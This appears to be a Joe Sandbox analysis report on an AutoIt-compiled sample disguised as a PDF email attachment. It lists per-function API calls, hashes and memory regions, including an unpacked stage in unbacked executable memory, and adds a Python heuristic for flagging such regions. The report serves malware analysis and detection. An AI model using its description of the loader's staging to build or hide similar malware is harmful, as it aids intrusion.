                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                          • API String ID: 4212290369-3242690629
                                                                                                          • Opcode ID: d26e68bbb2a8d998c9db105411e5023794332e72bc536e1eec0bff61d3e1fe32
                                                                                                          • Instruction ID: ef3719a2d63e517964d39cbb3e78a825bee690531352112436f23a32e42331b2
                                                                                                          • Opcode Fuzzy Hash: d26e68bbb2a8d998c9db105411e5023794332e72bc536e1eec0bff61d3e1fe32
                                                                                                          • Instruction Fuzzy Hash: FBB2E470608741DFDB25DF24D888BABB7E4FF84304F14891DE98A972A1D779E844CB92

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 007B8F5F: __time64.LIBCMT ref: 007B8F69
                                                                                                            • Part of subcall function 00754EE5: _fseek.LIBCMT ref: 00754EFD
                                                                                                          • __wsplitpath.LIBCMT ref: 007B9234
                                                                                                            • Part of subcall function 007740FB: __wsplitpath_helper.LIBCMT ref: 0077413B
                                                                                                          • _wcscpy.LIBCMT ref: 007B9247
                                                                                                          • _wcscat.LIBCMT ref: 007B925A
                                                                                                          • __wsplitpath.LIBCMT ref: 007B927F
                                                                                                          • _wcscat.LIBCMT ref: 007B9295
                                                                                                          • _wcscat.LIBCMT ref: 007B92A8
                                                                                                            • Part of subcall function 007B8FA5: _memmove.LIBCMT ref: 007B8FDE
                                                                                                            • Part of subcall function 007B8FA5: _memmove.LIBCMT ref: 007B8FED
                                                                                                          • _wcscmp.LIBCMT ref: 007B91EF
                                                                                                            • Part of subcall function 007B9734: _wcscmp.LIBCMT ref: 007B9824
                                                                                                            • Part of subcall function 007B9734: _wcscmp.LIBCMT ref: 007B9837
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007B9452
                                                                                                          • _wcsncpy.LIBCMT ref: 007B94C5
                                                                                                          • DeleteFileW.KERNEL32(?,?), ref: 007B94FB
                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007B9511
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007B9522
                                                                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007B9534
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1500180987-0
                                                                                                          • Opcode ID: c59ef068977e3aff8661775f1340b30dfa53578152f6fc8729b892b229b6a861
                                                                                                          • Instruction ID: 0ede02df348552511382f57f585f22cacd97ff77af80d50ea4c3dc1d1a2cec52
                                                                                                          • Opcode Fuzzy Hash: c59ef068977e3aff8661775f1340b30dfa53578152f6fc8729b892b229b6a861
                                                                                                          • Instruction Fuzzy Hash: D8C14CB1D00219AADF21DFA5CC89ADEB7BCEF45300F0040AAF609E7141DB789A858F65

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00753074
                                                                                                          • RegisterClassExW.USER32(00000030), ref: 0075309E
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                                                                                                          • LoadIconW.USER32(000000A9), ref: 007530F2
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                          • Opcode ID: 8cde020b73bcee8bbc808501bb263c286305945dd7894fa624d3882c299660dd
                                                                                                          • Instruction ID: 6ff89c88b3da8b546a2209ac452c10d5b3a01d4931aed2234740f0d6b3415fad
                                                                                                          • Opcode Fuzzy Hash: 8cde020b73bcee8bbc808501bb263c286305945dd7894fa624d3882c299660dd
                                                                                                          • Instruction Fuzzy Hash: C63105B1901309EFDB008FA4EC89ADEBBF4FF09321F14812AE551E62A0D3B90645CF95

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00753A50
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00753A5F
                                                                                                          • LoadIconW.USER32(00000063), ref: 00753A76
                                                                                                          • LoadIconW.USER32(000000A4), ref: 00753A88
                                                                                                          • LoadIconW.USER32(000000A2), ref: 00753A9A
                                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00753AC0
                                                                                                          • RegisterClassExW.USER32(?), ref: 00753B16
                                                                                                            • Part of subcall function 00753041: GetSysColorBrush.USER32(0000000F), ref: 00753074
                                                                                                            • Part of subcall function 00753041: RegisterClassExW.USER32(00000030), ref: 0075309E
                                                                                                            • Part of subcall function 00753041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                                                                                                            • Part of subcall function 00753041: InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                                                                                                            • Part of subcall function 00753041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                                                                                                            • Part of subcall function 00753041: LoadIconW.USER32(000000A9), ref: 007530F2
                                                                                                            • Part of subcall function 00753041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                          • String ID: #$0$AutoIt v3$Pm
                                                                                                          • API String ID: 423443420-4097620050
                                                                                                          • Opcode ID: d2e3722d2bc98e48a83b977e95bfc1d33cd69c0e7a213548f85b93273a69c6dd
                                                                                                          • Instruction ID: 1151941688972536eb8bdac508ec3577ef06baaae6daa5d7552279cd72d164d2
                                                                                                          • Opcode Fuzzy Hash: d2e3722d2bc98e48a83b977e95bfc1d33cd69c0e7a213548f85b93273a69c6dd
                                                                                                          • Instruction Fuzzy Hash: 4A214872D01308EFEB10DFA4EC19BDD7BB9FB48721F00812AF504A62A1D3B956548F84

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00753074
                                                                                                          • RegisterClassExW.USER32(00000030), ref: 0075309E
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                                                                                                          • LoadIconW.USER32(000000A9), ref: 007530F2
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                          • Opcode ID: 34f04198c8ab155990e538ceda2fdb9eb652d4eeb37a34582b4a6f116f3d8a1a
                                                                                                          • Instruction ID: 519f7754d666ee2a3a645d334dd7e5a527774040de17eb35fda99e20cb00d937
                                                                                                          • Opcode Fuzzy Hash: 34f04198c8ab155990e538ceda2fdb9eb652d4eeb37a34582b4a6f116f3d8a1a
                                                                                                          • Instruction Fuzzy Hash: FD21C3B1911618EFDB00DFA4EC89BDEBBF8FB08710F00812AF912A62A0D7B545448F95

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 00754706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,,?,007537AE,?), ref: 00754724
                                                                                                            • Part of subcall function 0077050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00757165), ref: 0077052D
                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007571A8
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0078E8C8
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0078E909
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0078E947
                                                                                                          • _wcscat.LIBCMT ref: 0078E9A0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                          • API String ID: 2673923337-2727554177
                                                                                                          • Opcode ID: 2dcd656f537bc68dc1466973ead1ff2c4693c4c686c817d3dae2490912fbb6a5
                                                                                                          • Instruction ID: c1df7ad6f83ac984d6dc260274d87001e5a89095dbd096c4f08ded7caf09f491
                                                                                                          • Opcode Fuzzy Hash: 2dcd656f537bc68dc1466973ead1ff2c4693c4c686c817d3dae2490912fbb6a5
                                                                                                          • Instruction Fuzzy Hash: 1F718E71509301DEC704EF25E8459EBBBFCFF84350B40892EF485872A1EBB9A959CB52

                                                                                                          Control-flow Graph

                                                                                                          • Control-flow graph rendering not captured in text export (legend: Executed / Not Executed). Recoverable block list: entry block 753633-753681; blocks calling DefWindowProcW (7536ca), PostQuitMessage (75374b), KillTimer (7536f9), SetTimer and RegisterWindowMessageW (753715), CreatePopupMenu (75373e), MoveWindow (78d0a8), SetFocus (78d097).
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 007536D2
                                                                                                          • KillTimer.USER32(?,00000001), ref: 007536FC
                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0075371F
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0075372A
                                                                                                          • CreatePopupMenu.USER32 ref: 0075373E
                                                                                                          • PostQuitMessage.USER32(00000000), ref: 0075374D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                          • String ID: TaskbarCreated$%~
                                                                                                          • API String ID: 129472671-4286669069
                                                                                                          • Opcode ID: da801f4a98c84499da0c85d008f87c72e8051add29f1b6942348379e0f393b7b
                                                                                                          • Instruction ID: a3fec465e4c0d715b25583e8a426a856faf58d4ce0be8abdeb09c696dd102fb5
                                                                                                          • Opcode Fuzzy Hash: da801f4a98c84499da0c85d008f87c72e8051add29f1b6942348379e0f393b7b
                                                                                                          • Instruction Fuzzy Hash: E34159B2600509EBDB206F64DC4DBFA3768FF44382F504529FD02D22B1CAEC9D499365

                                                                                                          Control-flow Graph

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$
                                                                                                          • API String ID: 1825951767-2885450264
                                                                                                          • Opcode ID: 47da7e246018a1b9f0f9ce2b4b19e081dd2fcf951ed58e9929227f6b77d117a0
                                                                                                          • Instruction ID: 0cce08328ab7f55a1372885808bfa95c476a9bd5d1e7cd94648f6b93d2beb5d2
                                                                                                          • Opcode Fuzzy Hash: 47da7e246018a1b9f0f9ce2b4b19e081dd2fcf951ed58e9929227f6b77d117a0
                                                                                                          • Instruction Fuzzy Hash: 28A14E7291021DDACB15EBA0DC59AEEB778FF54341F44442AE816B71A1DFB86A0CCB60

Control-flow Graph
• Function at 0xE84440 (graph rendered as an image on the original page). API calls in address order: CreateFileW (block 0xE844F5), VirtualAlloc (0xE84539), ReadFile (0xE8455A), VirtualAlloc (0xE84578), CloseHandle (0xE84640), VirtualFree (0xE84650), VirtualFree (0xE8472C); internal calls to 0xE81E50, 0xE85350, 0xE855A0 and 0xE853B0; the block at 0xE8465E branches back to the CreateFileW block, so the open/read sequence runs in a loop.
APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E84511
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E84737
Memory Dump Source
• Source File: 00000000.00000002.2101778828.0000000000E81000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E81000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e81000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID: +M
• API String ID: 204039940-1837007667
• Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
• Instruction ID: f09c45b90f6954eb44df57943945dbb3193e19328852dbe671a47d4c2a169e81
• Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
• Instruction Fuzzy Hash: 57A106B4E00209EBDB14DFA4C894BEEBBB5FF48304F209159E519BB2C0D7759A81DB94
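The memory dump source of this function is the security-relevant detail: 0xE81000 is PAGE_EXECUTE_READWRITE memory of type MEM_PRIVATE and Joe Sandbox marks it "based on PE: false", i.e. executable code that no loaded module backs, which is where an unpacked or injected stage normally lives (the AutoIt stub sections at 0x750000 are MEM_IMAGE by contrast). The Python below is an added example, not part of Joe Sandbox or of this report: it parses the dump names listed on this page and flags exactly that combination, the same heuristic a memory-forensics malfind pass applies. Reading the fifth and seventh fields of the name as the Win32 MEMORY_BASIC_INFORMATION Protect and Type values is an assumption that the values seen here (0x20, 0x02 and 0x04 with 0x01000000; 0x40 with 0x00020000) are consistent with; the two remaining numeric fields are left unparsed.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# MEMORY_BASIC_INFORMATION.Protect base values (PAGE_GUARD and friends live in higher bits).
PAGE_FLAGS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
# MEMORY_BASIC_INFORMATION.Type values.
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout of a Joe Sandbox dump name:
#   proc.stage.id.base.protect.<unparsed>.type.<unparsed>.sdmp
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\."
    r"(?P<memtype>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp"
)


@dataclass
class Region:
    name: str
    base: int
    protect: int
    memtype: int

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def image_backed(self) -> bool:
        return self.memtype == 0x1000000

    def describe(self) -> str:
        prot = PAGE_FLAGS.get(self.protect & 0xFF, hex(self.protect))
        return f"{self.base:#010x} {prot} {MEM_TYPES.get(self.memtype, hex(self.memtype))}"


def parse_sdmp(name: str) -> Region:
    m = SDMP_RE.search(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    return Region(name, int(m["base"], 16), int(m["protect"], 16), int(m["memtype"], 16))


def suspicious_regions(names: Iterable[str]) -> List[Region]:
    """Executable pages that no PE image backs: the usual home of an unpacked stage."""
    return [r for r in map(parse_sdmp, names) if r.executable and not r.image_backed]


# Dump names quoted from this report: the main module's sections and the 0xE81000 region.
DUMPS = [
    "00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2101778828.0000000000E81000.00000040.00000020.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for region in map(parse_sdmp, DUMPS):
        print(region.describe())
    for region in suspicious_regions(DUMPS):
        print("unbacked executable memory:", region.describe())
```

Run against the names above, only the 0xE81000 region is flagged; the 0x751000 .text section is executable but image-backed and therefore expected. The same filter applied to a full report's dump list is a quick way to find which region to disassemble first.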

Control-flow Graph
• Single basic block 0x7539D5-0x753A45 (graph rendered as an image on the original page): two CreateWindowExW calls followed by two ShowWindow calls.
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00753A03
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00753A24
• ShowWindow.USER32(00000000,?,?), ref: 00753A38
• ShowWindow.USER32(00000000,?,?), ref: 00753A41
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: d97d8bfc38ff4c28b96a87ecabadba6169e26f0f083d7878a411b0193abb10d3
• Instruction ID: f5f667745e09626d5b8649f0f3d0d9ac546a9a508ca23a3581f857697dc59eca
• Opcode Fuzzy Hash: d97d8bfc38ff4c28b96a87ecabadba6169e26f0f083d7878a411b0193abb10d3
• Instruction Fuzzy Hash: 4DF0D072541690BEEA315717AC49FA72F7DEBC6F50B00812AF905E2170C5751851DA74

Control-flow Graph
• Function at 0x7B955B (graph rendered as an image on the original page): only internal calls appear in the graph (0x754EE5, 0x7B9734, 0x754F0B, 0x77571C, 0x7B9109, 0x7B8953, 0x7B8B06 and 0x772D55, the last being _free); RtlFreeHeap and GetLastError are reached inside 0x772D55, _fseek and _wcscmp inside 0x754EE5 and 0x7B9734.
APIs
  • Part of subcall function 00754EE5: _fseek.LIBCMT ref: 00754EFD
  • Part of subcall function 007B9734: _wcscmp.LIBCMT ref: 007B9824
  • Part of subcall function 007B9734: _wcscmp.LIBCMT ref: 007B9837
• _free.LIBCMT ref: 007B96A2
• _free.LIBCMT ref: 007B96A9
• _free.LIBCMT ref: 007B9714
  • Part of subcall function 00772D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00779A24), ref: 00772D69
  • Part of subcall function 00772D55: GetLastError.KERNEL32(00000000,?,00779A24), ref: 00772D7B
• _free.LIBCMT ref: 007B971C
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-2740779761
• Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
• Instruction ID: 9470386fb44729559fc8ab53471bcc042425a88997586882fe39820afac83bfe
• Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
• Instruction Fuzzy Hash: AE514CB1A04218EBDF249F64CC89ADEBBB9EF48304F10449EF61DA3241DB755A91CF58

Control-flow Graph
• Function at 0xE84200 (graph rendered as an image on the original page). Call order: 0xE81E50, 0xE840F0 (which calls Sleep), CreateFileW (0xE84333), VirtualAlloc (block 0xE8435B), ReadFile (0xE84379), then 0xE84130 and 0xE830F0, optionally 0xE84180, then ExitProcess (block 0xE843EA). The short branches after CreateFileW, VirtualAlloc and ReadFile (0xE8433F, 0xE84356, 0xE84377, 0xE84392) go straight to the function exit at 0xE843F4.
APIs
  • Part of subcall function 00E840F0: Sleep.KERNELBASE(000001F4), ref: 00E84101
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E84333
Memory Dump Source
• Source File: 00000000.00000002.2101778828.0000000000E81000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E81000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e81000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: 2BME9Q1T061LR6XH
• API String ID: 2694422964-1635537286
• Opcode ID: 3b40e96584fc41c97b10cb6ea8402b048e8898cd35e977414ba671d9027460a3
• Instruction ID: 16a42c642dcbd9145b21c6e3d4ad7efaf630c09f3e026e1dd10b9e6a1540c3b0
• Opcode Fuzzy Hash: 3b40e96584fc41c97b10cb6ea8402b048e8898cd35e977414ba671d9027460a3
• Instruction Fuzzy Hash: 6A517071D04249EBEF11EBA4C855BEEBBB9EF18304F004199E608BB2C1D7B91B45CB65
